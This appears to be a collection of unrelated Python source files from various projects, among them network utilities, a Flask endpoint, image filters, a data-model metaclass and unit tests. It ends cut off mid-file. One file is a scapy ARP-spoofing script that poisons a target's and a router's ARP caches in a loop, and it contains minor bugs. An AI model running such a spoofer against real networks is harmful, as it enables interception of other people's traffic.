attributes_remove_enum = {
1250003: { "enum": None }, # RESOLUTION, Don't use enum since simple value will do
1250333: { "enum": None }, # POWER_LINE_FREQUENCY, Don't use enum since simple value will do
1150025: { "enum": None }, # CURRENT_SOURCE, Don't use enum since simple value will do
1150029: { "enum": None }, # INPUT_RESISTANCE, Don't use enum since simple value will do
1150053: { 'enum': None, 'python_type': 'bool', }, # DC_BIAS, Don't use the enum because a bool will do
1150023: { 'enum': None, 'python_type': 'bool', }, # OFFSET_COMP_OHMS, Don't use the enum because a bool will do
}
|
python
|
from Components.Sources.Source import Source
from Components.Network import iNetwork
from Tools.Directories import fileExists
from twisted import version
from socket import has_ipv6, AF_INET6, inet_ntop, inet_pton
def normalize_ipv6(orig):
net = []
if '/' in orig:
net = orig.split('/')
if net[1] == "128":
del net[1]
else:
net.append(orig)
addr = net[0]
addr = inet_ntop(AF_INET6, inet_pton(AF_INET6, addr))
if len(net) == 2:
addr += "/" + net[1]
return (addr)
def getAdapterIPv6(interface):
addr = _("IPv4-only kernel")
if fileExists('/proc/net/if_inet6'):
addr = _("IPv4-only Python/Twisted")
if has_ipv6 and version.major >= 12:
proc = '/proc/net/if_inet6'
tempaddrs = []
for line in file(proc).readlines():
if line.startswith('fe80'):
continue
tmpaddr = ""
tmp = line.split()
if interface == tmp[5]:
tmpaddr = ":".join([tmp[0][i:i + 4] for i in range(0, len(tmp[0]), 4)])
if tmp[2].lower() != "ff":
tmpaddr = "%s/%s" % (tmpaddr, int(tmp[2].lower(), 16))
tempaddrs.append(normalize_ipv6(tmpaddr))
if len(tempaddrs) > 1:
tempaddrs.sort()
addr = ', '.join(tempaddrs)
elif len(tempaddrs) == 1:
addr = tempaddrs[0]
elif len(tempaddrs) == 0:
addr = _("none/IPv4-only network")
return (addr)
class Interface:
def __init__(self, name):
self.name = name
self.mac = None
self.dhcp = None
self.ip = None
self.netmask = None
self.gateway = None
self.ipv6 = None
class Network(Source):
LAN = 0
WLAN = 1
def __init__(self, device=LAN):
Source.__init__(self)
if device is self.LAN:
self.iface = "eth0"
elif device is self.WLAN:
self.iface = "ath0"
ConvertIP = lambda self, l: "%s.%s.%s.%s" % tuple(l) if l and len(l) == 4 else "0.0.0.0"
def getInterface(self):
iface = Interface(self.iface)
iface.mac = iNetwork.getAdapterAttribute(self.iface, "mac")
iface.dhcp = iNetwork.getAdapterAttribute(self.iface, "dhcp")
iface.ip = self.ConvertIP(iNetwork.getAdapterAttribute(self.iface, "ip"))
iface.netmask = self.ConvertIP(iNetwork.getAdapterAttribute(self.iface, "netmask"))
iface.gateway = self.ConvertIP(iNetwork.getAdapterAttribute(self.iface, "gateway"))
iface.ipv6 = getAdapterIPv6(self.iface)
return iface
interface = property(getInterface)
def getList(self):
return [
(
ifname,
iNetwork.getAdapterAttribute(ifname, "mac"),
iNetwork.getAdapterAttribute(ifname, "dhcp"),
self.ConvertIP(iNetwork.getAdapterAttribute(ifname, "ip")),
self.ConvertIP(iNetwork.getAdapterAttribute(ifname, "netmask")),
self.ConvertIP(iNetwork.getAdapterAttribute(ifname, "gateway")),
getAdapterIPv6(ifname)
)
for ifname in iNetwork.getConfiguredAdapters()
]
list = property(getList)
lut = {
"Name": 0,
"Mac": 1,
"Dhcp": 2,
"Ip": 3,
"Netmask": 4,
"Gateway": 5,
"Ipv6": 6,
}
|
python
|
from services.lib.config import Config
from services.lib.db import DB
from localization.base import BaseLocalization
from localization.eng import EnglishLocalization
from localization.rus import RussianLocalization
from services.lib.utils import Singleton
class LocalizationManager(metaclass=Singleton):
def __init__(self, cfg: Config):
self.config = cfg
self.default = EnglishLocalization(cfg)
self._langs = {
'rus': RussianLocalization(cfg),
'eng': self.default
}
def get_from_lang(self, lang) -> BaseLocalization:
return self._langs.get(str(lang), self.default)
@staticmethod
def lang_key(chat_id):
return f'user:lang:{chat_id}'
async def get_lang(self, chat_id, db: DB) -> str:
redis = await db.get_redis()
lang = await redis.get(self.lang_key(chat_id))
return lang if lang else None
async def set_lang(self, chat_id, lang, db: DB):
redis = await db.get_redis()
await redis.set(self.lang_key(chat_id), str(lang))
return await self.get_from_db(chat_id, db)
async def get_from_db(self, chat_id, db: DB) -> BaseLocalization:
lang = await self.get_lang(chat_id, db)
return self.get_from_lang(lang)
|
python
|
import cv2
import numpy as np
img = cv2.imread("Resources/lena.png")
kernel = np.ones((5,5),np.uint8)
imgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
imgBlur = cv2.GaussianBlur(imgGray,(7,7),0)
imgCanny = cv2.Canny(img,150,200)
imgDialation = cv2.dilate(imgCanny,kernel,iterations=1)
imgEroded = cv2.erode(imgDialation,kernel,iterations=1)
cv2.imshow("Gray Image",imgGray)
cv2.imshow("Blur Image",imgBlur)
cv2.imshow("Canny Image",imgCanny)
cv2.imshow("Dialation Image",imgDialation)
cv2.imshow("Eroded Image",imgEroded)
cv2.waitKey(0)
|
python
|
from __future__ import annotations
from collections import defaultdict
from typing import Any, Dict, Optional, Tuple
from .fields import Field, ModelField
from .validation import Validation
class ModelBase:
__slots__ = ()
def __init__(self):
pass
@classmethod
def get_xmltag(cls) -> str:
xmltag = getattr(cls, "__xmltag__", None)
if xmltag is None:
xmltag = cls.__name__
xmlns = getattr(cls, "__xmlns__", None)
if xmlns:
return "{" + xmlns + "}" + xmltag
else:
return xmltag
def get_xmlattrs(self) -> Dict[str, str]:
return {}
class ModelMetaclass(type):
def __new__(cls, name, bases, dct):
_meta = {}
# Add fields from subclasses
for b in bases:
if not issubclass(b, ModelBase):
continue
b_meta = getattr(b, "_meta", None)
if b_meta is None:
continue
_meta.update(b_meta)
# Add fields from the class itself
slots = []
for field_name, val in list(dct.items()):
if isinstance(val, Field):
# Store its description in the Model _meta
_meta[field_name] = val
val.set_name(field_name)
elif isinstance(val, type) and issubclass(val, ModelBase):
# Store its description in the Model _meta
val = ModelField(val)
_meta[field_name] = val
val.set_name(field_name)
else:
# Leave untouched
continue
# Remove field_name from class variables
dct.pop(field_name)
# Add it as a slot in the instance
slots.append(field_name)
dct["__slots__"] = slots
res = super().__new__(cls, name, bases, dct)
res._meta = _meta
return res
class Model(ModelBase, metaclass=ModelMetaclass):
"""
Declarative description of a data structure that can be validated and
serialized to XML.
"""
__slots__ = ()
def __init__(self, *args, **kw):
super().__init__()
for name, value in zip(self._meta.keys(), args):
kw[name] = value
for name, field in self._meta.items():
value = kw.pop(name, None)
if value is None:
value = field.get_construct_default()
else:
value = field.clean_value(value)
setattr(self, name, value)
def update(self, *args, **kw):
"""
Set multiple values in the model.
Arguments are treated in the same way as in the constructor. Any field
not mentioned is left untouched.
"""
for name, value in zip(self._meta.keys(), args):
setattr(self, name, value)
for name, value in kw.items():
setattr(self, name, value)
def has_value(self):
for name, field in self._meta.items():
if field.has_value(getattr(self, name)):
return True
return False
@classmethod
def clean_value(cls, value: Any) -> Optional["Model"]:
"""
Create a model from the given value.
Always make a copy even if value is already of the right class, to
prevent mutability issues.
"""
if value is None:
return None
if isinstance(value, dict):
return cls(**value)
elif isinstance(value, ModelBase):
kw = {}
for name, field in cls._meta.items():
kw[name] = getattr(value, name, None)
return cls(**kw)
else:
raise TypeError(f"{cls.__name__}: {value!r} is {type(value).__name__}"
" instead of a Model or dict instance")
def validate_fields(self, validation: Validation):
for name, field in self._meta.items():
field.validate(validation, getattr(self, name))
def validate_model(self, validation: Validation):
pass
def validate(self, validation: Validation):
self.validate_fields(validation)
self.validate_model(validation)
def to_jsonable(self):
res = {}
for name, field in self._meta.items():
value = field.to_jsonable(getattr(self, name))
if value is not None:
res[name] = value
return res
def to_python(self, **kw) -> str:
args = []
for name, field in self._meta.items():
value = getattr(self, name)
if not field.has_value(value):
continue
args.append(name + "=" + field.to_python(value, **kw))
namespace = kw.get("namespace")
if namespace is None:
constructor = self.__class__.__module__ + "." + self.__class__.__qualname__
elif namespace is False:
constructor = self.__class__.__qualname__
else:
constructor = namespace + "." + self.__class__.__qualname__
return "{}({})".format(constructor, ", ".join(args))
def to_xml(self, builder):
with builder.element(self.get_xmltag(), **self.get_xmlattrs()) as b:
for name, field in self._meta.items():
field.to_xml(b, getattr(self, name))
def __setattr__(self, key: str, value: any):
field = self._meta.get(key, None)
if field is not None:
value = field.clean_value(value)
super().__setattr__(key, value)
def _to_tuple(self) -> Tuple[Any]:
return tuple(getattr(self, name) for name in self._meta.keys())
def __eq__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return True
if has_self != has_other:
return False
return self._to_tuple() == other._to_tuple()
def __ne__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return False
if has_self != has_other:
return True
return self._to_tuple() != other._to_tuple()
def __lt__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return False
if has_self and not has_other:
return False
if not has_self and has_other:
return True
return self._to_tuple() < other._to_tuple()
def __gt__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return False
if has_self and not has_other:
return True
if not has_self and has_other:
return False
return self._to_tuple() > other._to_tuple()
def __le__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return True
if has_self and not has_other:
return False
if not has_self and has_other:
return True
return self._to_tuple() <= other._to_tuple()
def __ge__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return True
if has_self and not has_other:
return True
if not has_self and has_other:
return False
return self._to_tuple() >= other._to_tuple()
def __str__(self):
vals = []
for name, field in self._meta.items():
vals.append(name + "=" + field.to_str(getattr(self, name)))
return "{}({})".format(self.__class__.__name__, ", ".join(vals))
def __repr__(self):
vals = []
for name, field in self._meta.items():
vals.append(name + "=" + field.to_str(getattr(self, name)))
return "{}({})".format(self.__class__.__name__, ", ".join(vals))
def from_etree(self, el):
if el.tag != self.get_xmltag():
raise RuntimeError("element is {} instead of {}".format(el.tag, self.get_xmltag()))
tag_map = {field.get_xmltag(): (name, field) for name, field in self._meta.items()}
# Group values by tag
by_name = defaultdict(list)
for child in el:
try:
name, field = tag_map[child.tag]
except KeyError:
raise RuntimeError("found unexpected element {} in {}".format(child.tag, el.tag))
by_name[name].append(child)
for name, elements in by_name.items():
field = self._meta[name]
if field.multivalue:
setattr(self, name, field.from_etree(elements))
elif len(elements) != 1:
raise RuntimeError(
"found {} {} elements in {} instead of just 1".format(
len(elements), child.tag, el.tag))
else:
setattr(self, name, field.from_etree(elements[0]))
def diff(self, diff, other):
has_self = self.has_value()
has_other = other.has_value()
if not has_self and not has_other:
return
if has_self != has_other:
diff.add(None, self, other)
return
for name, field in self._meta.items():
first = getattr(self, name)
second = getattr(other, name)
field.diff(diff, first, second)
|
python
|
"""Extension for using climatecontrol with dataclasses."""
from dataclasses import is_dataclass
from typing import Generic, Mapping, Type, TypeVar
import dacite
from climatecontrol.core import Climate as BaseClimate
from climatecontrol.core import SettingsItem as BaseSettingsItem
from climatecontrol.fragment import FragmentPath
T = TypeVar("T")
class SettingsItem(BaseSettingsItem):
@classmethod
def _self_is_mutable(cls, value) -> bool:
return super()._self_is_mutable(value) or is_dataclass(value)
class Climate(BaseClimate, Generic[T]):
"""Climate settings manager for dataclasses."""
_processors = tuple(list(BaseClimate._processors) + [])
def __init__(self, *args, dataclass_cls: Type[T], **kwargs):
"""Initialize dataclass climate object.
Uses a dataclass as a schema to initialize settings and check types.
Args:
*args, **kwargs: See :class:`climateontrol.Climate`
dataclass_cls: Additional argument specific to the dataclass extension. Given a class devorated by :func:`dataclasses.dataclass` the settings object will be initialized and checked according to the classes specifications and types.
Examples:
>>> from climatecontrol.ext.dataclasses import Climate
>>> from dataclasses import dataclass, field
>>>
>>> @dataclass
... class SettingsSubSchema:
... d: int = 4
...
>>> @dataclass
... class SettingsSchema:
... a: str = 'test'
... b: bool = False
... c: SettingsSubSchema = field(default_factory=SettingsSubSchema)
...
>>> climate = Climate(dataclass_cls=SettingsSchema)
>>> # defaults are initialized automatically:
>>> climate.settings.a
'test'
>>> climate.settings.c.d
4
>>> # Types are checked if given
>>> climate.update({'c': {'d': 'boom!'}})
Traceback (most recent call last):
...
dacite.exceptions.WrongTypeError: wrong value type for field "c.d" - should be "int" instead of value "boom!" of type "str"
See Also:
:module:`dacite`: Used to initialize and check dataclasses.
"""
self.dataclass_cls = dataclass_cls
super().__init__(*args, **kwargs)
@property
def settings(self) -> T:
self.ensure_initialized()
return SettingsItem(self._data, self, FragmentPath())
def parse(self, data: Mapping) -> T:
"""Parse data into the provided dataclass."""
data = super().parse(data)
obj: T = dacite.from_dict(self.dataclass_cls, {k: v for k, v in data.items()})
return obj
|
python
|
from flask import Blueprint, request, Response, json
from main.models import database
import csv
mypage_page = Blueprint('mypage', __name__)
def read_csv(user_id):
file = csv.reader(open('../main/recommendation/recommend_list/{}.csv'.format(user_id), 'r',encoding='utf-8'))
lists = []
for row in file:
# 각 열마다 어떤 데이터인지 읽고 dicts에 저장
if row[2] == 'title':
continue
lists.append(database.Book.objects(isbn=row[1]))
return lists
def read_borrow(borrow_list):
borrow_lists = []
# book api를 이용해서 이미지 등 읽어오기
for embook in borrow_list:
borrow_lists.append(database.Book.objects(isbn=embook['isbn']).first())
return borrow_lists
@mypage_page.route('/', methods=['GET'])
def mypage():
user_id = request.values.get('user_id')
if user_id:
user = database.User.objects(user_id=user_id).first()
if user:
# borrow_list 불러오기
borrow_list = []
for embook in database.Unit.objects(name=user.unit).first().books_list:
if embook['user_id']==user_id:
borrow_list.append(embook)
borrow_lists = read_borrow(borrow_list)
# recommend_list 불러오기(csv파일을 불러올 예정)
recommend_list = read_csv(user_id)
# user_data 불러오기
user_data='https://www.projectlib.tk/image/{}.png'.format(user_id)
# 서버 추천 코드
from main.recommendation import data_update
data_update.update()
from main.recommendation import wordcloud_maker
wordcloud_maker.exe_img(user_id)
# res
dicts = {
"borrow_list": borrow_lists,
"recommend_list": recommend_list,
"user_data":user_data
}
resultJson = json.dumps(dicts, ensure_ascii=False)
return Response(resultJson, mimetype="application/json", status=200)
resultJson = json.dumps({"message": "not login"})
return Response(resultJson, mimetype="application/json", status=401)
@mypage_page.route('/borrow_list', methods=['GET'])
def borrow():
user_id = request.values.get('user_id')
if user_id:
user = database.User.objects(user_id=user_id).first()
if user:
borrow_list = []
for embook in database.Unit.objects(name=user.unit).first().books_list:
if embook['user_id']==user_id:
borrow_list.append(embook)
borrow_lists = read_borrow(borrow_list)
resultJson = json.dumps(borrow_lists, ensure_ascii=False)
return Response(resultJson, mimetype="application/json", status=200)
resultJson = json.dumps({"message": "not login"})
return Response(resultJson, mimetype="application/json", status=401)
@mypage_page.route('/recommend_list', methods=['GET'])
def recommend():
# 서버 추천 코드
from main.recommendation import data_update
data_update.update()
user_id = request.values.get('user_id')
if user_id:
user = database.User.objects(user_id=user_id).first()
if user:
recommend_list = read_csv(user_id)
resultJson = json.dumps(recommend_list, ensure_ascii=False)
return Response(resultJson, mimetype="application/json", status=200)
resultJson = json.dumps({"message": "not login"})
return Response(resultJson, mimetype="application/json", status=401)
|
python
|
# Imports
import numpy as np
import matplotlib.pyplot as plt
import os
# Results directory
directory = os.path.join("results", "cbis", "history")
figs_directory = os.path.join("results", "cbis", "figures")
# Models
MODELS = ["densenet121", "resnet50", "vgg16"]
# Training Formats
TRAINING_MODE = ["baseline", "baselinedaug", "mldam", "mldamdaug"]
# Go through models
for model in MODELS:
# Go through mode of training
for train_mode in TRAINING_MODE:
# Get filenames
# Train
train_losses = np.load(os.path.join(directory, f"{model}_{train_mode}_tr_losses.npy"), allow_pickle=True)
train_metrics = np.load(os.path.join(directory, f"{model}_{train_mode}_tr_metrics.npy"), allow_pickle=True)
# Validation
val_losses = np.load(os.path.join(directory, f"{model}_{train_mode}_val_losses.npy"), allow_pickle=True)
val_metrics = np.load(os.path.join(directory, f"{model}_{train_mode}_val_metrics.npy"), allow_pickle=True)
# Plot losses
plt.title(f"{model.upper()} | {train_mode.upper()}")
plt.plot(range(len(train_losses)), train_losses, label="Train")
plt.plot(range(len(val_losses)), val_losses, label="Validation")
plt.ylabel("Loss")
plt.xlabel("Epoch")
plt.legend()
plt.savefig(os.path.join(figs_directory, f"{model.lower()}_{train_mode.lower()}_loss.png"))
# plt.show()
plt.clf()
# Plot metrics
metrics_dict = {0:"Accuracy", 1:"Recall", 2:"Precision", 3:"F1-Score"}
for metric in range(4):
metric_name = metrics_dict[metric]
plt.title(f"{model.upper()} | {train_mode.upper()}")
plt.plot(range(train_metrics.shape[0]), train_metrics[:, metric], label="Train")
plt.plot(range(val_metrics.shape[0]), val_metrics[:, metric], label="Validation")
plt.ylabel(f"{metric_name}")
plt.xlabel("Epoch")
plt.legend()
plt.savefig(os.path.join(figs_directory, f"{model.lower()}_{train_mode.lower()}_{metric_name.lower()}.png"))
# plt.show()
plt.clf()
|
python
|
import scapy.all as scapy
import time
import termcolor
class ConnectToTarget:
def spoof(self,router_ip,target_ip,router_mac,target_mac ):
packet1=scapy.ARP(op=2, hwdst=router_mac,pdst=router_ip, psrc=target_ip)
packet2=scapy.ARP(op=2, hwdst=target_mac,pdst=target_ip, psrc=router_ip)
scapy.send(packet1)
scapy.send(packet2)
def get_mac_address(ip_address):
broadcast_layer=scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
arp_layer=scapy.ARP(pdst=ip_address)
get_mac_packet=broadcast_layer/arp_layer
answer=scapy.srp(get_mac_packet, timeout=2, verbose=False)[0]
return answer[0][1].hwsrc
def get_ip_and_route_address(self):
target_ip= input(termcolor.colored('[+] Target Ip Address:','yellow'))
router_ip= input(termcolor.colored('[+] Router Ip Address): ','blue'))
target_mac=self.get_mac_address(target_ip)
router_mac=self.get_mac_address(router_ip)
try:
while True:
self.spoof(router_ip,target_ip,router_mac,router_mac)
time.sleep(2)
except KeyboardInterrupt:
print("Closing ARP Spoofer")
connectTargetObject=ConnectToTarget()
connectTargetObject.get_ip_and_route_address()
|
python
|
"""Test stack
"""
import ARgorithmToolkit
algo = ARgorithmToolkit.StateSet()
stack = ARgorithmToolkit.Stack("st",algo)
def test_declare():
"""Test stack creation
"""
last_state = algo.states[-1]
assert last_state.content["state_type"] == "stack_declare"
def test_operations():
"""Test stack operations
"""
stack.push(3)
stack.push(9)
assert stack.body == [3,9]
last_state = algo.states[-1]
assert last_state.content["state_type"] == "stack_push"
assert last_state.content["state_def"]["body"] == stack.body
assert last_state.content["state_def"]["element"] == 9
assert stack.top() == 9
last_state = algo.states[-1]
assert last_state.content["state_type"] == "stack_top"
assert stack.top() == stack.pop()
last_state = algo.states[-1]
assert last_state.content["state_type"] == "stack_pop"
assert stack.body == [3]
stack.pop()
try:
stack.pop()
except ARgorithmToolkit.ARgorithmError:
pass
def test_size():
"""Test size operations
"""
assert stack.empty() and len(stack)==0
|
python
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2017, Johannes Köster"
__email__ = "[email protected]"
__license__ = "MIT"
import os
import re
import shutil
import subprocess as sp
from datetime import datetime
import time
from snakemake.remote import AbstractRemoteObject, AbstractRemoteProvider
from snakemake.exceptions import WorkflowError
from snakemake.common import lazy_property
from snakemake.logging import logger
if not shutil.which("gfal-copy"):
raise WorkflowError(
"The gfal-* commands need to be available for " "gfal remote support."
)
class RemoteProvider(AbstractRemoteProvider):
supports_default = True
allows_directories = True
def __init__(
self,
*args,
keep_local=False,
stay_on_remote=False,
is_default=False,
retry=5,
**kwargs
):
super(RemoteProvider, self).__init__(
*args,
keep_local=keep_local,
stay_on_remote=stay_on_remote,
is_default=is_default,
**kwargs
)
self.retry = retry
@property
def default_protocol(self):
"""The protocol that is prepended to the path when no protocol is specified."""
return "gsiftp://"
@property
def available_protocols(self):
"""List of valid protocols for this remote provider."""
# TODO gfal provides more. Extend this list.
return ["gsiftp://", "srm://"]
class RemoteObject(AbstractRemoteObject):
mtime_re = re.compile(r"^\s*Modify: (.+)$", flags=re.MULTILINE)
size_re = re.compile(r"^\s*Size: ([0-9]+).*$", flags=re.MULTILINE)
def __init__(self, *args, keep_local=False, provider=None, **kwargs):
super(RemoteObject, self).__init__(
*args, keep_local=keep_local, provider=provider, **kwargs
)
def _gfal(self, cmd, *args, retry=None, raise_workflow_error=True):
if retry is None:
retry = self.provider.retry
_cmd = ["gfal-" + cmd] + list(args)
for i in range(retry + 1):
try:
logger.debug(_cmd)
return sp.run(
_cmd, check=True, stderr=sp.PIPE, stdout=sp.PIPE
).stdout.decode()
except sp.CalledProcessError as e:
if i == retry:
if raise_workflow_error:
raise WorkflowError(
"Error calling gfal-{}:\n{}".format(cmd, e.stderr.decode())
)
else:
raise e
else:
# try again after some seconds
time.sleep(1)
continue
# === Implementations of abstract class members ===
def exists(self):
try:
self._gfal(
"ls", "-a", self.remote_file(), retry=0, raise_workflow_error=False
)
except sp.CalledProcessError as e:
if e.returncode == 2:
# exit code 2 means no such file or directory
return False
else:
raise WorkflowError(
"Error calling gfal-ls:\n{}".format(e.stderr.decode())
)
# exit code 0 means that the file is present
return True
def _stat(self):
stat = self._gfal("stat", self.remote_file())
return stat
def mtime(self):
# assert self.exists()
stat = self._stat()
mtime = self.mtime_re.search(stat).group(1)
date = datetime.strptime(mtime, "%Y-%m-%d %H:%M:%S.%f")
return date.timestamp()
def size(self):
# assert self.exists()
stat = self._stat()
size = self.size_re.search(stat).group(1)
return int(size)
def download(self):
if self.exists():
if self.size() == 0:
# Globus erroneously thinks that a transfer is incomplete if a
# file is empty. Hence we manually touch the local file.
self.local_touch_or_create()
return self.local_file()
# Download file. Wait for staging.
source = self.remote_file()
target = "file://" + os.path.abspath(self.local_file())
# disable all timeouts (file transfers can take a long time)
self._gfal(
"copy", "-p", "-f", "-n", "4", "-t", "0", "-T", "0", source, target
)
os.sync()
return self.local_file()
return None
def upload(self):
target = self.remote_file()
source = "file://" + os.path.abspath(self.local_file())
# disable all timeouts (file transfers can take a long time)
self._gfal("copy", "-p", "-f", "-n", "4", "-t", "0", "-T", "0", source, target)
@property
def list(self):
# TODO implement listing of remote files with patterns
raise NotImplementedError()
def host(self):
return self.local_file().split("/")[0]
|
python
|
import os
import os.path
import json
import numpy as np
import sys
import itertools
import random
import argparse
import csv
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
UTILS_DIR = os.path.abspath(os.path.join(BASE_DIR, '..', 'utils'))
sys.path.append(UTILS_DIR)
sys.path.append(BASE_DIR)
# sys.path.insert(1, '../utils/')
from data_helper import *
from coord_helper import *
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--home_dir_data", default="../data")
args = parser.parse_args()
home_dir_data = args.home_dir_data
cp_result_folder_dir = os.path.join(home_dir_data, 'dataset_cp')
cp_mat_folder_dir = os.path.join(home_dir_data, 'dataset_cp_mat')
pose_result_folder_dir = os.path.join(home_dir_data, 'collection_result')
seq_result_folder_dir = os.path.join(args.home_dir_data, 'collection_result_seq')
out_dir = os.path.join(home_dir_data, 'result_name_n_pose_dict.csv')
all_data = {}
ct = 0
for cp_result_file in os.listdir(cp_result_folder_dir):
result_file_dir = os.path.join(cp_result_folder_dir, cp_result_file)
if os.path.getsize(result_file_dir) == 0:
continue
result_file_name = cp_result_file[:-5]
# pose_result_file = '{}.txt'.format(result_file_name)
# pose_result_file_dir = os.path.join(pose_result_folder_dir, pose_result_file)
# assert os.path.isfile(pose_result_file_dir)
#import time
#a = time.time()
try:
with open(result_file_dir) as f:
pose_idx = [tmp['index'] for tmp in json.load(f)]
except:
continue
#b = time.time()
final_pose_idx = []
for i, k in enumerate(pose_idx):
# result_json_dir = os.path.join(seq_result_folder_dir, result_file_name + '-' + str(k) + '.json')
np_dir = os.path.join(seq_result_folder_dir, result_file_name + '-' + str(k) + '-0-pose.npy')
if os.path.exists(np_dir):
final_pose_idx.append(i)
#print(i, pose_idx)
#assert i in pose_idx
#print(time.time() - b, b-a)
all_data[result_file_name] = final_pose_idx
ct += 1
print(result_file_dir, final_pose_idx, ct)
if ct % 500 == 0:
# break
print('writing...', len(all_data))
w = csv.writer(open(out_dir, "w+"))
for key, val in all_data.items():
w.writerow([key, *val])
print('writing...', len(all_data))
w = csv.writer(open(out_dir, "w+"))
for key, val in all_data.items():
w.writerow([key, *val])
|
python
|
import unittest
from Calculator import Calculator
from CsvReader.CSVReader import CsvReader
class MyTestCase(unittest.TestCase):
def test_instantiate_calculator(self):
calculator = Calculator()
self.assertIsInstance(calculator, Calculator)
def test_addition_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Addition.csv").data
for test_case in test_cases:
self.assertEqual(calculator.add(int(test_case['Value 2']), int(test_case['Value 1'])), int(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Addition!")
def test_multiplication_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Multiplication.csv").data
for test_case in test_cases:
self.assertEqual(calculator.multiply(int(test_case['Value 2']), int(test_case['Value 1'])), int(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Multiplication!")
def test_subtraction_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Subtraction.csv").data
for test_case in test_cases:
self.assertEqual(calculator.subtract(int(test_case['Value 2']), int(test_case['Value 1'])), int(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Subtraction!")
def test_squaring_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Square.csv").data
for test_case in test_cases:
self.assertEqual(calculator.square(int(test_case['Value 1'])), int(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Squaring!")
def test_square_root_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Square Root.csv").data
for test_case in test_cases:
self.assertEqual(calculator.sqrt(int(test_case['Value 1'])), float(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Square Root!")
def test_division_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Division.csv").data
for test_case in test_cases:
self.assertEqual(calculator.divide(int(test_case['Value 2']), int(test_case['Value 1'])), float(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Division!")
def test_results_property_add(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Addition.csv").data
for test_case in test_cases:
self.assertEqual(calculator.add(int(test_case['Value 2']), int(test_case['Value 1'])), calculator.result)
print("Test cases (Addition) static variable :: result passed!")
def test_results_property_sub(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Subtraction.csv").data
for test_case in test_cases:
self.assertEqual(calculator.subtract(int(test_case['Value 2']), int(test_case['Value 1'])), calculator.result)
print("Test cases (Subtraction) static variable :: result passed!")
def test_results_property_mul(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Multiplication.csv").data
for test_case in test_cases:
self.assertEqual(calculator.multiply(int(test_case['Value 2']), int(test_case['Value 1'])), calculator.result)
print("Test cases (Multiplication) static variable :: result passed!")
def test_results_property_div(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Division.csv").data
for test_case in test_cases:
self.assertEqual(calculator.divide(int(test_case['Value 2']), int(test_case['Value 1'])), calculator.result)
print("Test cases (Division) static variable :: result passed!")
def test_results_property_square(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Square.csv").data
for test_case in test_cases:
self.assertEqual(calculator.square(int(test_case['Value 1'])), calculator.result)
print("Test cases (Squaring) static variable :: result passed!")
def test_results_property_square_root(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Square Root.csv").data
for test_case in test_cases:
self.assertEqual(calculator.sqrt(int(test_case['Value 1'])), calculator.result)
print("Test cases (Square Root) static variable :: result passed!")
if __name__ == '__main__':
unittest.main()
|
python
|
import numpy as np
import pandas as pd
import xarray as xr
import cubepy
from pyplan_engine.classes.evaluators.BaseEvaluator import BaseEvaluator
from pyplan_engine.classes.evaluators.CubepyEvaluator import CubepyEvaluator
from pyplan_engine.classes.evaluators.IPythonEvaluator import IPythonEvaluator
from pyplan_engine.classes.evaluators.NumpyEvaluator import NumpyEvaluator
from pyplan_engine.classes.evaluators.PandasEvaluator import PandasEvaluator
from pyplan_engine.classes.evaluators.XArrayEvaluator import XArrayEvaluator
from pyplan_engine.classes.evaluators.BokehEvaluator import BokehEvaluator
from pyplan_engine.classes.evaluators.PlotlyEvaluator import PlotlyEvaluator
from pyplan_engine.classes.evaluators.MatplotlibEvaluator import MatplotlibEvaluator
from pyplan_engine.classes.XHelpers import XIndex
from bokeh.plotting import Figure
from bokeh.layouts import LayoutDOM
from plotly.graph_objs._figure import Figure as PlotlyFigue
import inspect
from matplotlib.artist import Artist as MatplotlibArtist
class Evaluator(object):
ipytonMethods = ["_repr_html_", "_repr_json_",
"_repr_jpeg_", "_repr_png_", "_repr_pretty_"]
@staticmethod
def createInstance(result):
if result is None:
return BaseEvaluator()
else:
if isinstance(result, pd.DataFrame) or isinstance(result, pd.Series) or isinstance(result, pd.Index):
return PandasEvaluator()
elif isinstance(result, xr.DataArray) or isinstance(result, XIndex):
return XArrayEvaluator()
elif isinstance(result, MatplotlibArtist) or inspect.ismodule(result) and "matplotlib.pyplot" in str(result) or isinstance(result, np.ndarray) and len(result) > 0 and isinstance(result.item(0), MatplotlibArtist):
return MatplotlibEvaluator()
elif isinstance(result, np.ndarray):
return NumpyEvaluator()
elif isinstance(result, Figure) or isinstance(result, LayoutDOM):
return BokehEvaluator()
elif isinstance(result, PlotlyFigue):
